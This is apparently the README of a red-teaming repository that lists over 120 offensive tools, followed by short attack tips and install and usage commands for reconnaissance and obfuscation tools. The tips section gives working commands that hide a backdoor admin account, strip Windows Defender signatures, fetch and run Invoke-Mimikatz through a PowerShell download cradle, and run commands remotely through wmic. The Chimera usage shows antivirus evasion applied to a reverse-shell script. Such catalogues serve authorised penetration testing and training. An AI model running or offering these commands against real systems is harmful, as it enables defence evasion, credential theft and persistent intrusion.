├── README.md
└── backlog
/README.md:
--------------------------------------------------------------------------------
1 | # RedTeam-Tools
2 |
3 |
4 | 
5 |
6 |
7 | This github repository contains a collection of **120+** **tools** and **resources** that can be useful for **red teaming activities**.
8 |
9 | Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.
10 |
11 | > 🔗 If you are a Blue Teamer, check out [BlueTeam-Tools](https://github.com/christbowel/Blue-Teamer)
12 |
13 | > **Warning**
14 | >
15 | > *The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.*
16 |
17 | > **Note**
18 | >
19 | > *Hide Tool List headings with the arrow.*
20 | >
21 | > *Click 🔙 to get back to the list.*
22 |
23 | # Tool List
24 |
25 |
26 | Red Team Tips $\textcolor{gray}{\text{13 tips}}$
27 |
44 |
45 |
46 |
47 | Reconnaissance $\textcolor{gray}{\text{20 tools}}$
48 |
72 |
73 |
74 |
75 | Resource Development $\textcolor{gray}{\text{8 tools}}$
76 |
77 |
78 | - Chimera PowerShell obfuscation
79 | - msfvenom Payload creation
80 | - Shellter Dynamic shellcode injection tool
81 | - Freeze Payload creation (circumventing EDR)
82 | - WordSteal Steal NTML hashes with Microsoft Word
83 | - WSH Wsh payload
84 | - HTA Hta payload
85 | - VBA Vba payload
86 |
87 |
88 |
89 |
90 |
91 | Initial Access $\textcolor{gray}{\text{6 tools}}$
92 |
102 |
103 |
104 |
105 | Execution $\textcolor{gray}{\text{12 tools}}$
106 |
122 |
123 |
124 |
125 | Persistence $\textcolor{gray}{\text{4 tools}}$
126 |
127 |
128 | - Impacket Python script suite
129 | - Empire Post-exploitation framework
130 | - SharPersist Windows persistence toolkit
131 | - ligolo-ng Tunneling tool that uses a TUN interface
132 |
133 |
134 |
135 |
136 |
137 | Privilege Escalation $\textcolor{gray}{\text{9 tools}}$
138 |
151 |
152 |
153 |
154 | Defense Evasion $\textcolor{gray}{\text{5 tools}}$
155 |
156 |
157 | - Invoke-Obfuscation Script obfuscator
158 | - Veil Metasploit payload obfuscator
159 | - SharpBlock EDR bypass via entry point execution prevention
160 | - Alcatraz GUI x64 binary obfuscator
161 | - Mangle Compiled executable manipulation
162 | - AMSI Fail PowerShell snippets that break or disable AMSI
163 |
164 |
165 |
166 |
167 |
168 | Credential Access $\textcolor{gray}{\text{9 tools}}$
169 |
182 |
183 |
184 |
185 | Discovery $\textcolor{gray}{\text{6 tools}}$
186 |
187 |
188 | - PCredz Credential discovery PCAP/live interface
189 | - PingCastle Active directory assessor
190 | - Seatbelt Local vulnerability scanner
191 | - ADRecon Active directory recon
192 | - adidnsdump Active Directory Integrated DNS dumping
193 | - scavenger Scanning tool for scavenging systems
194 |
195 |
196 |
197 |
198 |
199 | Lateral Movement $\textcolor{gray}{\text{12 tools}}$
200 |
216 |
217 |
218 |
219 | Collection $\textcolor{gray}{\text{3 tools}}$
220 |
221 |
222 | - BloodHound Active directory visualisation
223 | - Snaffler Active directory credential collector
224 | - linWinPwn Active Directory Enumeration and Vulnerability checks
225 |
226 |
227 |
228 |
229 |
230 | Command and Control $\textcolor{gray}{\text{6 tools}}$
231 |
232 |
233 | - Havoc Command and control framework
234 | - Covenant Command and control framework (.NET)
235 | - Merlin Command and control framework (Golang)
236 | - Metasploit Framework Command and control framework (Ruby)
237 | - Pupy Command and control framework (Python)
238 | - Brute Ratel Command and control framework ($$$)
239 |
240 |
241 |
242 |
243 |
244 | Exfiltration $\textcolor{gray}{\text{5 tools}}$
245 |
254 |
255 |
256 |
257 | Impact $\textcolor{gray}{\text{3 tools}}$
258 |
265 |
266 |
267 | Red Team Tips
268 | ====================
269 |
270 | *Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.*
271 |
272 | **Note:** *Nearly all tips are currently from [@Alh4zr3d](https://twitter.com/Alh4zr3d), he posts good Red Team Tips!*
273 |
274 | ### [🔙](#tool-list)Hiding the local admin account
275 |
276 | ```bash
277 | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
278 | ```
279 |
280 | **Description:** *'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'*
281 |
282 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
283 |
284 | **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)
285 |
286 | ### [🔙](#tool-list)Cripple windows defender by deleting signatures
287 |
288 | ```bash
289 | "%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
290 | ```
291 |
292 | **Description:** *'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'*
293 |
294 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
295 |
296 | **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1611005101262389250)
297 |
298 | ### [🔙](#tool-list)Enable multiple RDP sessions per user
299 |
300 | ```bash
301 | reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
302 | ```
303 |
304 | **Description:** *'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'*
305 |
306 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
307 |
308 | **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)
309 |
310 | ### [🔙](#tool-list)Sysinternals PsExec.exe local alternative
311 |
312 | ```bash
313 | wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
314 | ```
315 |
316 | **Description:** *'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'*
317 |
318 | **Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)
319 |
320 | **Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1607473627922063360)
321 |
322 | ### [🔙](#tool-list)Live off the land port scanner
323 |
324 | ```bash
325 | 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(,$_)) "Port $_ open"} 2>$null
326 | ```
327 |
328 | **Description:** *'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'*
329 |
330 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
331 |
332 | **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)
333 |
334 | ### [🔙](#tool-list)Proxy aware PowerShell DownloadString
335 |
336 | ```bash
337 | $w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("")
338 | ```
339 |
340 | **Description:** *'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'*
341 |
342 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
343 |
344 | **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1596192664398966785)
345 |
346 | ### [🔙](#tool-list)Looking for internal endpoints in browser bookmarks
347 |
348 | ```bash
349 | type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
350 | ```
351 |
352 | **Description:** *'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'*
353 |
354 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
355 |
356 | **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)
357 |
358 | ### [🔙](#tool-list)Query DNS records for enumeration
359 |
360 | ```bash
361 | Get-DnsRecord -RecordType A -ZoneName FQDN -Server
362 | ```
363 |
364 | **Description:** *'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'*
365 |
366 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
367 |
368 | **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1587132627823181824)
369 |
370 | ### [🔙](#tool-list)Unquoted service paths without PowerUp
371 |
372 | ```bash
373 | Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
374 | ```
375 |
376 | **Description:** *'Finding unquoted service paths without PowerUp'*
377 |
378 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
379 |
380 | **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)
381 |
382 | ### [🔙](#tool-list)Bypass a disabled command prompt with /k
383 |
384 | ```bash
385 | # Win+R (To bring up Run Box)
386 | cmd.exe /k "whoami"
387 | ```
388 |
389 | **Description:** *'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.*
390 |
391 | **Credit:** Martin Sohn Christensen
392 |
393 | **Link:** [Blog](https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you)
394 |
395 | ### [🔙](#tool-list)Stop windows defender deleting mimikatz.exe
396 |
397 | ```bash
398 | (new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
399 | ```
400 |
401 | **Description:** *'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'*
402 |
403 | **Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)
404 |
405 | **Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)
406 |
407 | ### [🔙](#tool-list)Check if you are in a virtual machine
408 |
409 | ```bash
410 | reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
411 | ```
412 |
413 | **Description:** *'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'*
414 |
415 | **Credit:** [@dmcxblue](https://twitter.com/dmcxblue)
416 |
417 | **Link:** [Twitter](https://twitter.com/dmcxblue/status/1366779034672136194)
418 |
419 | ### [🔙](#tool-list)Enumerate AppLocker rules
420 |
421 | ```
422 | (Get-AppLockerPolicy -Local).RuleCollections
423 |
424 | Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
425 |
426 | reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
427 | ```
428 |
429 | **Description:** *'AppLocker can be a pain. Enumerate to see how painful'*
430 |
431 | **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)
432 |
433 | **Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)
434 |
435 | Reconnaissance
436 | ====================
437 |
438 | ### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness
439 |
440 | I have put together a bash one-liner that:
441 | - Passively collects a list of subdomains from certificate associations ([crt.sh](https://crt.sh/))
442 | - Actively requests each subdomain to verify it's existence ([httprobe](https://github.com/tomnomnom/httprobe))
443 | - Actively screenshots each subdomain for manual review ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))
444 |
445 | **Usage:**
446 |
447 | ```bash
448 | domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
449 | ```
450 |
451 | *Note: You must have [httprobe](https://github.com/tomnomnom/httprobe), [pup](https://github.com/EricChiang/pup) and [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains*
452 |
453 | 
454 |
455 | 
456 |
457 | ### [🔙](#tool-list)[jsendpoints](https://twitter.com/renniepak/status/1602620834463588352)
458 |
459 | A JavaScript bookmarklet for extracting all webpage endpoint links on a page.
460 |
461 | Created by [@renniepak](https://twitter.com/renniepak), this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.
462 |
463 | ```javascript
464 | javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i")})}setTimeout(writeResults,3e3);})();
465 | ```
466 |
467 | **Usage (Bookmarklet)**
468 |
469 | Create a bookmarklet...
470 |
471 | - `Right click your bookmark bar`
472 | - `Click 'Add Page'`
473 | - `Paste the above Javascript in the 'url' box`
474 | - `Click 'Save'`
475 |
476 | ...then visit the victim page in the browser and click the bookmarklet.
477 |
478 | 
479 |
480 | **Usage (Console)**
481 |
482 | Paste the above Javascript into the console window `F12` and press enter.
483 |
484 | 
485 |
486 | ### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)
487 |
488 | Fast vulnerability scanner that uses .yaml templates to search for specific issues.
489 |
490 | **Install:**
491 |
492 | ```bash
493 | go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
494 | ```
495 |
496 | **Usage:**
497 |
498 | ```bash
499 | cat domains.txt | nuclei -t /PATH/nuclei-templates/
500 | ```
501 |
502 | 
503 |
504 | ### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff)
505 |
506 | certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.
507 |
508 | You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.
509 |
510 | **Install:**
511 |
512 | ```bash
513 | git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
514 | ```
515 |
516 | **Usage:**
517 |
518 | ```python
519 | python3 certSniff.py -f example.txt
520 | ```
521 |
522 | 
523 |
524 | ### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)
525 |
526 | Nice tool for brute forcing file/folder paths on a victim website.
527 |
528 | **Install:**
529 |
530 | ```bash
531 | sudo apt install gobuster
532 | ```
533 |
534 | **Usage:**
535 |
536 | ```bash
537 | gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20
538 | ```
539 |
540 | 
541 |
542 | ### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)
543 |
544 | A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.
545 |
546 | Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...
547 |
548 | **Install: (Kali)**
549 |
550 | ```bash
551 | sudo apt update && sudo apt install -y feroxbuster
552 | ```
553 |
554 | **Install: (Mac)**
555 |
556 | ```bash
557 | curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
558 | ```
559 |
560 | **Install: (Windows)**
561 |
562 | ```bash
563 | Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
564 | Expand-Archive .\feroxbuster.zip
565 | .\feroxbuster\feroxbuster.exe -V
566 | ```
567 |
568 | For full installation instructions see [here](https://epi052.github.io/feroxbuster-docs/docs/installation/).
569 |
570 | **Usage:**
571 |
572 | ```bash
573 | # Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url
574 | ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
575 |
576 | # Scan with headers
577 | ./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
578 |
579 | # Read URLs from stdin
580 | cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
581 |
582 | # Proxy requests through burpsuite
583 | ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
584 | ```
585 |
586 |
587 | Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/).
588 |
589 | 
590 |
591 | *Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*
592 |
593 | ### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)
594 |
595 | A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
596 |
597 | Features:
598 |
599 | - Cloud detection (IPINFO API and Source Code)
600 | - Fast (concurrent)
601 | - Cross Platform (windows, linux, mac)
602 | - User-Agent Randomization
603 | - Proxy Randomization (HTTP, Socks5)
604 |
605 | **Install:**
606 |
607 | Download the latest [release](https://github.com/0xsha/CloudBrute/releases) for your system and follow the usage.
608 |
609 | **Usage:**
610 |
611 | ```bash
612 | # Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
613 | CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
614 |
615 | # Output results to file
616 | CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt
617 | ```
618 |
619 | 
620 |
621 | *Image used from https://github.com/0xsha/CloudBrute*
622 |
623 | ### [🔙](#tool-list)[dnsrecon](https://www.kali.org/tools/dnsrecon/#dnsrecon)
624 |
625 | dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.
626 |
627 | **Install:**
628 |
629 | ```bash
630 | sudo apt install dnsrecon
631 | ```
632 |
633 | **Usage:**
634 |
635 | ```bash
636 | dnsrecon -d google.com
637 | ```
638 |
639 | 
640 |
641 | ### [🔙](#tool-list)[shodan.io](https://www.shodan.io/dashboard)
642 |
643 | Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.
644 |
645 | 
646 |
647 | ### [🔙](#tool-list)[AORT](https://github.com/D3Ext/AORT)
648 |
649 | Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.
650 |
651 | **Install:**
652 |
653 | ```bash
654 | git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
655 | ```
656 |
657 | **Usage:**
658 |
659 | ```python
660 | python3 AORT.py -d google.com
661 | ```
662 |
663 | 
664 |
665 | ### [🔙](#tool-list)[spoofcheck](https://github.com/BishopFox/spoofcheck)
666 |
667 | A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.
668 |
669 | Domains are spoofable if any of the following conditions are met:
670 |
671 | - Lack of an SPF or DMARC record
672 | - SPF record never specifies `~all` or `-all`
673 | - DMARC policy is set to `p=none` or is nonexistent
674 |
675 | **Install:**
676 |
677 | ```bash
678 | git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
679 | ```
680 |
681 | **Usage:**
682 |
683 | ```bash
684 | ./spoofcheck.py [DOMAIN]
685 | ```
686 |
687 | 
688 |
689 | ### [🔙](#tool-list)[AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump)
690 |
691 | AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.
692 |
693 | **Install:**
694 |
695 | ```
696 | git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
697 | ```
698 |
699 | **Usage:**
700 |
701 | ```
702 | usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
703 |
704 | optional arguments:
705 | -h, --help show this help message and exit
706 | -D Download files. This requires significant diskspace
707 | -d If set to 1 or True, create directories for each host w/ results
708 | -t THREADS number of threads
709 | -l HOSTLIST
710 | -g GREPWORDS Provide a wordlist to grep for
711 | -m MAXSIZE Maximum file size to download.
712 |
713 | python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
714 | ```
715 |
716 | ### [🔙](#tool-list)[GitHarvester](https://github.com/metac0rtex/GitHarvester)
717 |
718 | Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.
719 |
720 | **Install:**
721 |
722 | ```
723 | git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
724 | ```
725 |
726 | **Usage:**
727 |
728 | ```
729 | ./githarvester.py
730 | ```
731 |
732 | ### [🔙](#tool-list)[truffleHog](https://github.com/dxa4481/truffleHog)
733 |
734 | TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.
735 |
736 | **Install (Binaries):** [Link](https://github.com/trufflesecurity/trufflehog/releases)
737 |
738 | **Install (Go):**
739 |
740 | ```
741 | git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
742 | ```
743 |
744 | **Usage:**
745 |
746 | ```
747 | trufflehog https://github.com/trufflesecurity/test_keys
748 | ```
749 |
750 | 
751 |
752 | ### [🔙](#tool-list)[Dismap](https://github.com/zhzyker/dismap)
753 |
754 | Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.
755 |
756 | Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.
757 |
758 | **Install:**
759 |
760 | Dismap is a binary file for Linux, MacOS, and Windows. Go to [Release](https://github.com/zhzyker/dismap/releases) to download the corresponding version to run:
761 |
762 | ```bash
763 | # Linux or MacOS
764 | chmod +x dismap-0.3-linux-amd64
765 | ./dismap-0.3-linux-amd64 -h
766 |
767 | # Windows
768 | dismap-0.3-windows-amd64.exe -h
769 | ```
770 |
771 | **Usage:**
772 |
773 | ```bash
774 | # Scan 192.168.1.1 subnet
775 | ./dismap -i 192.168.1.1/24
776 |
777 | # Scan, output to result.txt and json output to result.json
778 | ./dismap -i 192.168.1.1/24 -o result.txt -j result.json
779 |
780 | # Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
781 | ./dismap -i 192.168.1.1/24 --np --timeout 10
782 |
783 | # Scan, Number of concurrent threads 1000
784 | ./dismap -i 192.168.1.1/24 -t 1000
785 | ```
786 |
787 | 
788 |
789 | *Image used from https://github.com/zhzyker/dismap*
790 |
791 | ### [🔙](#tool-list)[enum4linux](https://github.com/CiscoCXSecurity/enum4linux)
792 |
793 | A tool for enumerating information from Windows and Samba systems.
794 |
795 | It can be used to gather a wide range of information, including:
796 |
797 | - Domain and domain controller information
798 | - Local user and group information
799 | - Shares and share permissions
800 | - Security policies
801 | - Active Directory information
802 |
803 | **Install: (Apt)**
804 |
805 | ```bash
806 | sudo apt install enum4linux
807 | ```
808 |
809 | **Install: (Git)**
810 |
811 | ```bash
812 | git clone https://github.com/CiscoCXSecurity/enum4linux
813 | cd enum4linux
814 | ```
815 |
816 | **Usage:**
817 |
818 | ```bash
819 | # 'Do everything'
820 | enum4linux.pl -a 192.168.2.55
821 |
822 | # Obtain list of usernames (RestrictAnonymous = 0)
823 | enum4linux.pl -U 192.168.2.55
824 |
825 | # Obtain list of usernames (using authentication)
826 | enum4linux.pl -u administrator -p password -U 192.168.2.55
827 |
828 | # Get a list of groups and their members
829 | enum4linux.pl -G 192.168.2.55
830 |
831 | # Verbose scan
832 | enum4linux.pl -v 192.168.2.55
833 | ```
834 |
835 | Full usage information can be found in this [blog](https://labs.portcullis.co.uk/tools/enum4linux/).
836 |
837 | 
838 |
839 | *Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*
840 |
841 | ### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)
842 |
843 | Dangerously fast dns/network/port scanner, created by [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), written in rust.
844 |
845 | You will need a subdomains file. *E.g. [Subdomain wordlist by Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.
846 |
847 | **Install:**
848 |
849 | Download the latest release from [here](https://github.com/Esc4iCEscEsc/skanuvaty/releases).
850 |
851 | ```bash
852 | # Install a wordlist
853 | sudo apt install wordlists
854 | ls /usr/share/dirb/wordlists
855 | ls /usr/share/amass/wordlists
856 | ```
857 |
858 | **Usage:**
859 |
860 | ```bash
861 | skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt
862 | ```
863 |
864 | 
865 |
866 | *Image used from https://github.com/Esc4iCEscEsc/skanuvaty*
867 |
868 | ### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)
869 |
870 | Metabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.
871 |
872 | **Main Features:**
873 |
874 | - Searching information about IP Address, ASN and Organization.
875 | - Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR.
876 | - Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).
877 | - Get Summary about IP address (powered by [@thebl4ckturtle](https://github.com/theblackturtle))
878 |
879 | **Install:**
880 |
881 | ```bash
882 | go install github.com/j3ssie/metabigor@latest
883 | ```
884 |
885 | **Usage:**
886 |
887 | ```bash
888 | # discovery IP of a company/organization
889 | echo "company" | metabigor net --org -o /tmp/result.txt
890 |
891 | # Getting more related domains by searching for certificate info
892 | echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
893 |
894 | # Only run rustscan with full ports
895 | echo '1.2.3.4/24' | metabigor scan -o result.txt
896 |
897 | # Reverse Whois to find related domains
898 | echo 'example.com' | metabigor related -s 'whois'
899 |
900 | # Get Google Analytics ID directly from the URL
901 | echo 'https://example.com' | metabigor related -s 'google-analytic'
902 | ```
903 |
904 | 
905 |
906 | *Image used from https://github.com/j3ssie/metabigor*
907 |
908 | ### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)
909 |
910 | Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.
911 |
912 | Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
913 |
914 | The findings will be presented through a web interface for easy browsing and analysis.
915 |
916 | **Note:** *Gitrob will need a Github access token in order to interact with the Github API. [Create a personal access token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) and save it in an environment variable in your .bashrc or similar shell configuration file:*
917 |
918 | ```bash
919 | export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
920 | ```
921 |
922 | **Install: (Go)**
923 |
924 | ```bash
925 | go get github.com/michenriksen/gitrob
926 | ```
927 |
928 | **Install: (Binary)**
929 |
930 | A [precompiled version](https://github.com/michenriksen/gitrob/releases) is available for each release.
931 |
932 | **Usage:**
933 |
934 | ```bash
935 | # Run against org
936 | gitrob {org_name}
937 |
938 | # Saving session to a file
939 | gitrob -save ~/gitrob-session.json acmecorp
940 |
941 | # Loading session from a file
942 | gitrob -load ~/gitrob-session.json
943 | ```
944 |
945 | 
946 |
947 | *Image used from https://www.uedbox.com/post/58828/*
948 |
949 | ### [🔙](#tool-list)[gowitness](https://github.com/sensepost/gowitness)
950 |
951 | Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.
952 |
953 | **Install: (Go)**
954 |
955 | ```bash
956 | go install github.com/sensepost/gowitness@latest
957 | ```
958 |
959 | Full installation information can be found [here](https://github.com/sensepost/gowitness/wiki/Installation).
960 |
961 | **Usage:**
962 |
963 | ```bash
964 | # Screenshot a single website
965 | gowitness single https://www.google.com/
966 |
967 | # Screenshot a cidr using 20 threads
968 | gowitness scan --cidr 192.168.0.0/24 --threads 20
969 |
970 | # Screenshot open http services from an namp file
971 | gowitness nmap -f nmap.xml --open --service-contains http
972 |
973 | # Run the report server
974 | gowitness report serve
975 | ```
976 |
977 | Full usage information can be found [here](https://github.com/sensepost/gowitness/wiki/Usage).
978 |
979 | 
980 |
981 | *Image used from https://github.com/sensepost/gowitness*
982 |
983 | Resource Development
984 | ====================
985 |
986 | ### [🔙](#tool-list)[Chimera](https://github.com/tokyoneon/Chimera)
987 |
988 | Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.
989 |
990 | **Install:**
991 |
992 | ```bash
993 | sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
994 | sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
995 | sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
996 | sudo chmod +x chimera.sh; ./chimera.sh --help
997 | ```
998 |
999 | **Usage:**
1000 |
1001 | ```bash
1002 | ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
1003 | copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
1004 | invoke-expression,out-string,write-error -j -g -k -r -p
1005 | ```
1006 |
1007 | 
1008 |
